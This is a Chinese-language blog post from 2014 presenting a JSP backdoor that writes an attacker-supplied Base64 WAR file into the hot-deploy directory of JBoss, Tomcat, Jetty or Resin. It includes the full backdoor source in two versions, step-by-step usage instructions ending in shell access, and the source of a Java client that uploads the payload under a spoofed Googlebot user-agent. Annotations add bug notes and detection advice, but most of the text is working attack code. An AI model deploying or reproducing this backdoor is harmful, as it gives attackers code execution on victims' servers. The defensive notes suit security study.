2014-01-07 16:38:20

Java WebServer 自动部署后门

在乌云社区发现有人发了一个利用 JBoss 自动部署（hot deploy）功能写入 war 的 JSP 后门，并询问此后门的使用方法。原始代码如下（参数名是随机生成的，没有任何输入过滤）：
<%-- WAR dropper for JBoss. A POST carrying pUBYyDsT (Base64 WAR bytes) and
     oAEICWIo (file name without extension) writes <jboss.server.home.dir>/deploy/<name>.war;
     the container's hot-deploy scanner then loads it. A request WITHOUT pUBYyDsT
     deletes that same WAR instead (clean-up path). Reviewer notes:
       - oAEICWIo is concatenated into the path unchecked, so "../" reaches any
         location the JVM user can write to, not just the deploy directory;
       - every exception is swallowed and nothing is written to the response,
         so a caller cannot tell success from failure;
       - sun.misc.BASE64Decoder is an internal JDK API (gone since Java 9);
         java.util.Base64 is the supported equivalent;
       - for defenders: a .jsp importing sun.misc.BASE64Decoder and opening a
         FileOutputStream under the deploy/webapps directory is a strong IOC,
         as is any file creation in that directory by the container process. --%>
<%@page
	import="java.io.*, 
    java.util.*, 
    sun.misc.BASE64Decoder"%>
<%
	String PJdpj = "";
	String pIGx = "";
	// jboss.server.home.dir is set by the JBoss launcher. If it is unset the
	// path below becomes the relative "null/deploy/...".
	String RSVw = System.getProperty("jboss.server.home.dir");
	if (request.getParameter("pUBYyDsT") != null) {
		try {
			PJdpj = request.getParameter("pUBYyDsT");
			pIGx = request.getParameter("oAEICWIo"); // null -> "null.war"
			byte[] rFPE = new BASE64Decoder().decodeBuffer(PJdpj);
			String MfNJU = RSVw + "/deploy/" + pIGx + ".war"; // no path sanitisation
			FileOutputStream twkH = new FileOutputStream(MfNJU);
			twkH.write(rFPE);
			twkH.close(); // not in finally: handle leaks if write() throws
		} catch (Exception e) {
			// swallowed on purpose: the response body is empty either way
		}
	} else {
		try {
			String VBpM = request.getParameter("oAEICWIo");
			String dhkDS = RSVw + "/deploy/" + VBpM + ".war";
			// Presumably relies on the hot-deploy scanner undeploying the app once
			// its WAR disappears; the return value of delete() is ignored.
			new File(dhkDS).delete();
		} catch (Exception e) {
			// swallowed
		}
	}
%>

思路挺聪明：JBoss、Tomcat 等 Server 一般都提供了自动部署（hot deploy）服务，也就是说只要把 war 包写入默认的自动部署目录，容器就会自动解包并加载它，不需要重启。反过来说，对该目录有写权限就等价于在容器进程中执行代码，防守方应监控该目录下的文件创建，并把部署目录的写权限限制在部署账号。

POST 提交到后门所在的 jsp：http://xxx.com/xxx.jsp

参数:

pUBYyDsT=war文件的Base64编码&amp;oAEICWIo=Test（oAEICWIo 是写入的文件名，不带 .war 后缀；代码对它没有任何过滤）

然后请求 http://xxx.com/Test 就 getshell 了。Test 是 war 文件的项目名（context path），由写入时的文件名决定。第一版后门在不带 pUBYyDsT 参数访问时会删除同名 war，用于事后清理。

只需改一下 getProperty 读取的属性名（例如 Tomcat 的 catalina.home、Jetty 的 jetty.home、Resin 的 resin.home）以及对应的部署目录，就能通用到其他 Server。

客户端工具:

Upload_War_后门.jar

iswin.war

源码:

/**
 * Action handler for jButton1: reads the WAR file whose path is in jTextField3,
 * Base64-encodes it and POSTs it to the backdoor URL in jTextField1 as
 * parameter pUBYyDsT, with the deploy name from jTextField2 as oAEICWIo.
 * Result text goes to jTextArea1.
 *
 * Reviewer notes:
 *  - "请求成功..." only means the POST returned without Jsoup throwing; the
 *    server-side JSP swallows its own exceptions, so a failed write still
 *    looks like success here.
 *  - fis is closed only on the success path; an exception in read() leaks it
 *    (try-with-resources would fix that).
 *  - The spoofed User-Agent is missing its closing parenthesis; a "Googlebot"
 *    UA issuing a POST to a .jsp is itself a useful detection signature.
 *  - BASE64Encoder is the internal sun.misc class, not java.util.Base64.
 */
private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
    	String war = jTextField3.getText();
    	if(war!=null){
            try {
            	FileInputStream fis = new FileInputStream(new File(war));
            	byte[] b = new byte[1024];
        		int n = 0;
        		ByteArrayOutputStream baos = new ByteArrayOutputStream();
        		// Slurp the whole WAR into memory before encoding.
        		while((n=fis.read(b))!=-1){
        			baos.write(b,0,n);
        		}
				String content = new BASE64Encoder().encode(baos.toByteArray());
				fis.close();
				Map<String,String> map = new HashMap<String, String>();
				map.put("oAEICWIo", jTextField2.getText());
				map.put("pUBYyDsT", content);
				// 30 s timeout; the WAR travels as a form-encoded POST body.
				Jsoup.connect(jTextField1.getText()).data(map).userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(30000).post();
				jTextArea1.setText("请求成功...");
			} catch (Exception e) {
				// Any local I/O or HTTP error is shown verbatim in the text area.
				jTextArea1.setText(e.toString());
			}
    	}
    }
    /**
     * Action handler for jButton2: opens a file chooser (starting in the user's
     * home directory, files only) and copies the selected path into jTextField3.
     * If the dialog is cancelled, path stays null and setText(null) clears the
     * field. Note that the chooser is passed as its own parent component.
     */
    private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {     
    	int result = 0;  
    	String path = null;
    	JFileChooser fileChooser = new JFileChooser();  
    	FileSystemView fsv = FileSystemView.getFileSystemView();
    	fileChooser.setCurrentDirectory(fsv.getHomeDirectory());  
    	fileChooser.setDialogTitle("请选择war文件.");  
    	fileChooser.setApproveButtonText("确定");  
    	fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY);  
    	result = fileChooser.showOpenDialog(fileChooser);  
    	if (JFileChooser.APPROVE_OPTION == result) {  
    	    path=fileChooser.getSelectedFile().getPath();
    	}
    	jTextField3.setText(path);
    }

修改后的 jsp 后门（根据 ServletContext.getServerInfo() 自动选择部署目录，注意末尾的删除逻辑拼错了文件名，实际删除的是 &lt;name&gt;.war.war，不存在，所以写入的 war 不会被清理）：

<%-- Multi-container variant of the WAR dropper. Same parameters as the JBoss
     version (pUBYyDsT = Base64 WAR, oAEICWIo = file name); the deploy
     directory is chosen from the server-info string instead of being
     hard-coded. Reviewer notes:
       - oAEICWIo is still unfiltered, so "../" escapes the deploy directory;
       - the delete at the end appends ".war" to a path that already ends in
         ".war", so it targets "<name>.war.war", which never exists: the
         written WAR is never removed, despite the apparent intent;
       - exceptions are swallowed; the response carries no status;
       - sun.misc.BASE64Decoder is an internal API removed in Java 9. --%>
<%@page import="java.io.*,java.util.*,sun.misc.BASE64Decoder"%>
<%!
	// Maps the lowercased ServletContext.getServerInfo() string to that
	// container's hot-deploy directory (with trailing slash). Anything that is
	// not jboss/jetty/resin falls through to Tomcat's catalina.home. If the
	// chosen property is unset the result is the relative path "null/...".
	// The request argument is unused.
	String getServer(HttpServletRequest request,String name){
		if(name.indexOf("jboss")!=-1){
			return System.getProperty("jboss.server.home.dir")+"/deploy/";
		}else if(name.indexOf("jetty")!=-1){
			return System.getProperty("jetty.home")+"/webapps/";
		}else if(name.indexOf("resin")!=-1){
			return System.getProperty("resin.home")+"/webapps/";
		}
		return System.getProperty("catalina.home")+"/webapps/";
	}
%>
<%
	String PJdpj = request.getParameter("pUBYyDsT");
	if (PJdpj!= null) {
		try {
			// Backslashes are normalised to "/" so Windows home dirs join cleanly.
			// A missing oAEICWIo yields "null.war"; no path sanitisation.
			String RSVw = getServer(request, application.getServerInfo().toLowerCase()).replaceAll("\\\\", "/")+request.getParameter("oAEICWIo")+".war";
			FileOutputStream twkH = new FileOutputStream(RSVw);
			twkH.write(new BASE64Decoder().decodeBuffer(PJdpj));
			twkH.close(); // not in finally: leaks if write() throws
			// BUG: RSVw already ends in ".war", so this is "<name>.war.war" and
			// delete() is a no-op (return value ignored). The dropped WAR stays.
			String dhkDS = RSVw+ ".war";
			new File(dhkDS).delete();
		} catch (Exception e) {
			// swallowed
		}
	}
%>